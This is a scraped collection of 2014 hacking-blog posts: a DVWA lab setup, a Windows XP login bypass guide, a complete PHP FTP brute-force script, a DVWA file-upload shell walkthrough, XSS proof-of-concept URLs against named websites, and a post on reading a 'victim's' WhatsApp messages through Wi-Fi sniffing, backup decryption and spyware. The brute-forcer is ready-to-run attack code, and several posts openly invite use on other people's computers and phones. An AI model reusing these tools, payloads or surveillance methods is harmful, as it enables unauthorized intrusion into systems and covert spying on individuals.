Now Start XAMPP Control Panel - Start [Apache] and [MySQL]

Now Just Open your Browser & type 127.0.0.1 or http://localhost

Hit Enter

Choose DVWA folder & You'll get started with Login page.

Username : admin Password : password

Finally you're done. Now practice, learn, create, pentest, and research..

Premium Responive Blogger Template Free Download - FOCSoft

2014-03-15T21:45:00.001+05:00

Download These free Responsive Blogger templates..

Click Here For Free Download

How To Bypass Windows XP Login Passwords From Scratch - FOCSoft

2014-03-15T21:34:00.000+05:00

Hello Friends

Step 1: The golden disclaimer
First, the standard disclaimer that goes with any good Instructable: This is to be used for instructional purposes only, and I am not liable for any damage or destruction to you or your computer that may occur from attempting this Instructable. In other words, if you delete your registry or mess with a school computer and get arrested, it's not my fault. And don't use this to get into someone else's computer either.*cough*
Step 2: The easy part

Ok, now to start.
If you have a login page like the one in the intro, go to step 2. If you have a login page like this one, it should be relatively easy to get into. Unless the default administrator account has been changed, all you have to do is type "Administrator" or "administrator" as the user name and the password will be either blank or "password". Then press "OK" and you should be in.
Step 3: The nastier part

If you have a fancy windows login page, things are a little more annoying. First, click "shut down" to shut down the computer. Then turn it back on. As soon as the screen turns on, press and hold F8. After about 10 seconds, a boot options menu will pop up.
Step 4: Safe mode

Now, in the menu, which should look like the picture below, select safe mode and press enter. It will show a whole bunch of gobbleygook for quite a while, (which you don't need to know anything about)and then it will bring you to the login page. This time though, there should be an account named "administrator". Click it, and either type "password" or nothing, whichever one works. If you don't get in after that, you're bummed

FTP Brute Force PHP Script - FOCSoft

2014-03-15T21:23:00.000+05:00

Hello Friends
Today I'm Sharing Brute Force PHP Script


 

function brute_ftp ($h, $p, $user, $pass)

{

        if ($connect = @ftp_connect ($h, $p))

        {

                if (@ftp_login ($connect, $user, $pass))

                {

                        echo "\nCracked : \n\tHost : $h\n\tUsername = $user\n\tPassword = $pass\n";

                        ftp_close ($connect);

                        exit (0);

                }

                else

                        echo "Error with Username \"$user\" & Password \"$pass\"\n";

        }

        else

                die ("Cannot Connect to FTP Host \"$h\" !\n");

}

 

        echo "

______ ___________  ______            _        ______                     

|  ___|_   _| ___ \ | ___ \          | |       |  ___|                   

| |_    | | | |_/ / | |_/ /_ __ _   _| |_ ___  | |_ ___  _ __ ___ ___ _ __

|  _|   | | |  __/  | ___ \ '__| | | | __/ _ \ |  _/ _ \| '__/ __/ _ \ '__|

| |     | | | |     | |_/ / |  | |_| | ||  __/ | || (_) | | | (_|  __/ | 

\_|     \_/ \_|     \____/|_|   \__,_|\__\___| \_| \___/|_|  \___\___|_|\n\n

      [*]-------------------------------------------------[*]

      [+] Script Name : FTP Brute Forcer                  [*]

      [+] Version : 2.0                                   [*]

      [+] Coded By : Yunus Incredibl + H Damas Sy         [*]

      [+] Contact us :                                    [*]

      [+]    https://www.facebook.com/yunusdfgdfg123155   [*]

      [+]    https://www.facebook.com/hdamas.sy.7509      [*]

      [*]------------------------------------------------ [*]

      \n\tUsage : php $argv[0] host port user.txt pass.txt\r\n\r\n";

 

if (isset ($argv[1]) && isset ($argv[2]) && isset ($argv[3]) && isset ($argv[4]))

{

        $host = $argv[1];

        $port = $argv[2];

        $userfile = $argv[3];

        $passfile = $argv[4];

 

        if (!file_exists ($userfile))

                die ("File $userfile not found !\n");

 

        if (!file_exists ($passfile))

                die ("File $passfile not found !\n");

 

        $users = explode ("\n", @file_get_contents ($userfile));

        $passs = explode ("\n", @file_get_contents ($passfile));

       

        foreach ($users as $user)

        {

                $user = trim ($user);

                foreach ($passs as $pass)

                {

                        $pass = trim ($pass);

                        brute_ftp ($host, $port, $user, $pass);

                }

        }

}

?>

File Upload Vulnerability - FOCSoft

2014-03-15T21:09:00.000+05:00

Hello Friends
Well do you know the most easiest & common way to hack a site is Shell Upload. To be honest i'm not going to teach you to hack any site or server, I'm just sharing what I know besides hacking is really very cool, when you learn new things.

What Do I Need ?

DVWA Penetration Testing Lab
Burp Suite or (Live HTTP Headers)
Recommended - Mozilla Firefox
Any PHP File or Shell
Brain, Curiosity & Patience

Description & Methodologies

File Upload Vulnerability, allows an attacker to upload any scripted (static or dynamic) files on target server. (It's really very dangerous) Assume you create a Site in PHP / MySQL. You also create simple Image Uploading Application so users can upload their own image file, but without any validation yours application blindly trusts on users file and upload it on your server.

So what if an evil minded hacker like you determine it and upload .PHP file instead of Image file ?, Well your application will accept it & store it in server, Now an attacker will locate that file into Browser and it will be executed as .PHP scripted file, through this an attacker can also upload malicious shells and get complete access to Database & Server.

Go on & Learn This Holy Hacky Method!

1. Start DVWA, Put Security to Low Level, & Click on Upload.

2. First we'll exploit easy application, that doesn't validates user's file. Well you can also go through 'View Source', to understand how it really works.

3. So first of all let's exploit LOW LEVEL security. There's an application that allows you to upload image file. Click on Browse choose your any PHP or HTML scripted file (Like deface page or HACKED!) well you can also use any Shells like C99. Remember there's no security on EASY Level, it'll blindly trust on your file and upload it on it's server directory. It will be little hard on Medium Level.
Below i'm using simple 'HACKED' page

I've named it w0rm.php on my desktop and here i upload it on dvwa.

4. Click on upload and it'll show you a successfully uploaded message with file directory! wow that's amazing let's locate that file into browser. Copy that directory location and run it in your browser after dvwa path.

Now check the result, poor DVWA... hahaha no issue!

5. So we've successfully exploited easy level. Well an attacker can also upload dangerous shells that can completely take over server, data and even rooting an entire server. So let's move on little hard stage. (Change Security level to Medium). Now try to upload the same file in Medium Level and observe what's the result. Well you'll get an error message on top - that your image was not uploaded.. Because it's not an image. Now switch to firefox with Tamper Data Addon to modify headers while transmission.

6. It's time for little trick : Rename your file with w0rm.php.jpg to confuse interpreter.

7. Up till now we didn't trapped any GET or POST request but now we'll do it, now again try to upload it but before clicking on upload start Tamper Data and click on Start Tamper to trap every request.

8. "Start Tamper" and click on Upload. And suddenly you'll get a pop-up - Click on Tamper : (Now we've to modify POST data)

9. Now Look into POST_DATA - Yes! we've to modify that stuff only, Just go in that text-area and search for your file name - at last change it to w0rm.php from w0rm.php.jpg and click on OK- [That's called BYPASSING application validation]

10. You'll see a successfully uploaded message, again locate it in your browser and watch.. IT'S HACKED! [Cool isn't it ?]

Cross Site Scripting (XSS) Found in GoAnimate - FOCSoft

2014-03-15T14:52:00.001+05:00

Description:-
An independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in GoAnimate Website www.goanimate.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept:-
http://goanimate.com/ajax/siteNav?jsoncallback=jQuery110209239860572852194_1393431502326%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28932656%29%3C/ScRiPt%3E&_=1393431502327
Mozilla POC :-

FOCSoft.BlogSpot.Com

Internet Explorer POC :-

FOCSoft.BlogSpot.Com

Conclusion:-
This vulnerability has been confirmed and patched by GoAnimate Security Team. I would like to thank them for their quick response to my report.
GoAnimate Hall of Fame:-
http://goanimate.com/video-maker-tips/security/

FOCSoft.BlogSpot.Com

Cross Site Scripting (XSS) Found in Magix - FOCSoft

2014-03-15T14:42:00.003+05:00

Description:-

An independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in Magix Website www.catooh.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept:-

http://www.catooh.com/us/sys/id/Katalog/area/8039/"/index.php?resize=0&popid=10&part=body&mediaId=%22%27%3Cimg%20src=x%20onerror=prompt%281%29%3E

FOCSoft.BlogSpot.Com

Conclusion:-

This vulnerability has been confirmed and patched by Magix Security Team. I would like to thank them for their quick response to my report.

Magix Hall of Fame:-

http://research.magix.com/

FOCSoft.BlogSpot.Com

Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft

2014-03-15T14:32:00.003+05:00

Description:-

Team_CC, An independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in 123contactform.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept:-

http://www.123contactform.com/index.php?domain=1%3Cimg%20src=x%20onerror=prompt%281%29%3E&module=login&p=new_user_validate&plan=0&sid=1v3di81f8htapinfjt2k0es3b5&u_openidtype=1

FOCSoft.BlogSpot.Com

Conclusion:-

This vulnerability has been confirmed and patched by 123ContactForm Security Team. I would like to thank them for their quick response to my report.

123ContactForm Hall of Fame:-

http://www.123contactform.com/security-acknowledgements.htm

FOCSoft.BlogSpot.Com

WhatsApp Sniffer, WhatsApp Hacking - FOCSoft

2014-03-15T07:32:00.004+05:00

1. WhatsApp Sniffer

WhatsAppSniffer is a tool for root terminals to read WhatsApp conversations of a WIFI network (Open, WEP, WPA/WPA2). It captures the conversations, pictures / videos and coordinates that aresent or received by an Android phone, iPhone or Nokia on the same WIFI network. It has not been tested with W indows Phone terminals. It can’t read the messages written or received by the BlackBerry’s, as they use their own servers and not WhatsApp’s.
This application is designed to demonstrate that the security of WhatsApp’s communications is null. WhatsAppSniffer just use the TCPDump program which reads all the WIFI network packets and filters those which has origin or destination WhatsApp’s servers. All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: “While we do not disallow the use of sniffers Such as Ethereal, tcpdump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp …. “)
For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional)

Requirements

A Rooted Android Device.
Your Victim Should Use Same Wi-Fi Through Which you are connected.
WhatsAppSniffer Donate ★ root v1.03.

2. Decrypting Conversations

have your victim locked his whatsapp? or you want all his conversation on your PC. Generally for security reasons WhatsApp encrypt Conversation while taking backup in SD Card or Phone Memory.But i have found a tool on XDA that claims to decrypt all the whatsapp conversation down to your PC.

If you have some access over his device you can also send files from Bluetooth to your device and later read all the conversations.

This tool is called WhatsApp Xtract and for this all credits goes to ztedd

Some general advice on how to backup Whatsapp and get the database file:

Android

- In Whatsapp go to settings – more – Backup Chats
- Copy the folder “Whatsapp” on the SD card to your backup location (e.g., PC)
- (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder “TitaniumBackup” on the SD card to your backup location (e.g., PC)
- Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files “wa.db” and “msgstore.db” you will find inside the Titanium Backup archive “com.whatsapp-[Date]-[some digits].tar.gz”, alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card.

iPhone

- use Itunes to create an unencrypted Backup
- use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can’t handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.)

Blackberry

- sync your blackberry with desktop manager and then copy the messagestore.db file from SD
- however, it seems that this file is encrypted? Currently we don’t know how to get the unencrypted messagestore.db file
- Blackberry not supported yet!

Nokia

- not known yet
- Nokia not supported yet!

For Further Detail about this Method you can move to this Forum of XDA.

3. Using Spywares

Using 3rd Party Spywares can be very useful for spying not only WhatsApp Conversation but also many things like, you can able to Track GPS Location, you can capture the lock screen passwords and they can be also used for monitoring Websites. there are many spywares in the market but i recommend is BOSSPY. Because it’s free